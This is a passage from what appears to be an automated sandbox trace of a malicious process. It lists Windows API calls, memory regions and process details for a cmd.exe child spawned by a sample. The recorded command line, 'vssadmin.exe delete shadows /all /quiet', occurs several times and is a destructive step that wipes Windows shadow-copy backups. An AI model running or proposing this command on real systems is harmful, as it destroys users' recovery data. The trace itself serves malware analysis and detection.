_Buffer=0x14f21c, _BufferCount=0x13, _Format="%08X", _ArgList=0x14f0e0 | out: _Buffer="00000000") returned 8 [0191.137] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.137] GetEnvironmentStringsW () returned 0x342410* [0191.137] FreeEnvironmentStringsW (penv=0x342410) returned 1 [0191.137] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.137] GetEnvironmentStringsW () returned 0x342410* [0191.137] FreeEnvironmentStringsW (penv=0x342410) returned 1 [0191.137] DeleteProcThreadAttributeList (in: lpAttributeList=0x14f138 | out: lpAttributeList=0x14f138) [0191.137] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.138] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.138] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.138] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.138] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.138] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.138] SetConsoleInputExeNameW () returned 0x1 [0191.138] GetConsoleOutputCP () returned 0x1b5 [0191.138] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.138] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.138] exit (_Code=0) Process: id = "422" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0x890" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "cmd.exe /C vssadmin.exe delete shadows /all /quiet " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27853 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27854 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27855 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27856 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 27857 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27858 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27859 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27860 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27861 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27862 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27863 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27864 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27865 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27866 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 27867 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 27868 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27869 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27870 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27871 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27872 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27873 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27874 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27875 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27876 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27877 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 27878 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27879 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27880 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27881 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 27882 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 27883 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27884 start_va = 0x340000 end_va = 0x440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 27885 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 27886 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 27918 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 599 os_tid = 0x85c [0190.788] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fc34 | out: lpSystemTimeAsFileTime=0x26fc34*(dwLowDateTime=0xa69f5ea0, dwHighDateTime=0x1d440a9)) [0190.788] GetCurrentProcessId () returned 0x890 [0190.788] GetCurrentThreadId () returned 0x85c [0190.788] GetTickCount () returned 0x36537 [0190.788] QueryPerformanceCounter (in: lpPerformanceCount=0x26fc2c | out: lpPerformanceCount=0x26fc2c*=24757714142) returned 1 [0190.789] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0190.789] __set_app_type (_Type=0x1) [0190.789] __p__fmode () returned 0x76b331f4 [0190.789] __p__commode () returned 0x76b331fc [0190.789] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0190.789] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0190.789] GetCurrentThreadId () returned 0x85c [0190.789] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x85c) returned 0x38 [0190.789] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.789] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0190.789] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.789] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0190.789] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fbc4 | out: phkResult=0x26fbc4*=0x0) returned 0x2 [0190.789] VirtualQuery (in: lpAddress=0x26fbfb, lpBuffer=0x26fb94, dwLength=0x1c | out: lpBuffer=0x26fb94*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.789] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fb94, dwLength=0x1c | out: lpBuffer=0x26fb94*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0190.790] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fb94, dwLength=0x1c | out: lpBuffer=0x26fb94*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0190.790] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fb94, dwLength=0x1c | out: lpBuffer=0x26fb94*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.790] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fb94, dwLength=0x1c | out: lpBuffer=0x26fb94*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0190.790] GetConsoleOutputCP () returned 0x1b5 [0190.790] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.790] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0190.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.790] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0190.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.790] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0190.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.790] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.790] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.790] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0190.791] GetEnvironmentStringsW () returned 0x470128* [0190.791] FreeEnvironmentStringsW (penv=0x470128) returned 1 [0190.791] GetEnvironmentStringsW () returned 0x470128* [0190.791] FreeEnvironmentStringsW (penv=0x470128) returned 1 [0190.791] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb34 | out: phkResult=0x26eb34*=0x40) returned 0x0 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, lpData=0x26eb40*=0xd8, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x1, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, lpData=0x26eb40*=0x1, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x0, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x40, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x40, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, lpData=0x26eb40*=0x40, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.791] RegCloseKey (hKey=0x40) returned 0x0 [0190.791] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb34 | out: phkResult=0x26eb34*=0x40) returned 0x0 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, lpData=0x26eb40*=0x40, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x1, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, lpData=0x26eb40*=0x1, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x0, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x9, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x9, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, lpData=0x26eb40*=0x9, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.792] RegCloseKey (hKey=0x40) returned 0x0 [0190.792] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886398 [0190.792] srand (_Seed=0x5b886398) [0190.792] GetCommandLineW () returned="cmd.exe /C vssadmin.exe delete shadows /all /quiet " [0190.792] GetCommandLineW () returned="cmd.exe /C vssadmin.exe delete shadows /all /quiet " [0190.792] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.793] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4719f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0190.793] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.793] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.793] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0190.793] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.793] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.793] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0190.793] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0190.793] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0190.793] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0190.793] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0190.793] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0190.793] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0190.793] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0190.793] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f900 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.793] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f900, lpFilePart=0x26f8fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f8fc*="Desktop") returned 0x18 [0190.793] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.793] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f67c | out: lpFindFileData=0x26f67c) returned 0x46ffb8 [0190.794] FindClose (in: hFindFile=0x46ffb8 | out: hFindFile=0x46ffb8) returned 1 [0190.794] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f67c | out: lpFindFileData=0x26f67c) returned 0x46ffb8 [0190.794] FindClose (in: hFindFile=0x46ffb8 | out: hFindFile=0x46ffb8) returned 1 [0190.794] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f67c | out: lpFindFileData=0x26f67c) returned 0x46ffb8 [0190.794] FindClose (in: hFindFile=0x46ffb8 | out: hFindFile=0x46ffb8) returned 1 [0190.794] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.794] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0190.794] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0190.794] GetEnvironmentStringsW () returned 0x470128* [0190.795] FreeEnvironmentStringsW (penv=0x470128) returned 1 [0190.795] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.795] GetConsoleOutputCP () returned 0x1b5 [0190.795] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.795] GetUserDefaultLCID () returned 0x409 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fa40, cchData=128 | out: lpLCData="0") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fa40, cchData=128 | out: lpLCData="0") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fa40, cchData=128 | out: lpLCData="1") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0190.796] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0190.797] GetConsoleTitleW (in: lpConsoleTitle=0x470190, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.901] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0190.901] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0190.901] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0190.902] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0190.902] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0190.903] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0190.903] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0190.903] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0190.903] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0190.903] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0190.904] GetConsoleTitleW (in: lpConsoleTitle=0x26f738, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.904] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\eebsym5\\desktop\\vssadmin.exe")) returned 0xffffffff [0190.904] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0190.904] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0190.904] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0190.904] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0190.904] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0190.904] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0190.904] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0190.904] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0190.904] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0190.904] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0190.904] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0190.904] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0190.904] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0190.904] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0190.905] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0190.905] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0190.905] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0190.905] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0190.905] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0190.905] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0190.905] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0190.905] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0190.905] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0190.905] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0190.905] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0190.905] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0190.905] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0190.905] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0190.905] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0190.905] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0190.905] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0190.905] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0190.905] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 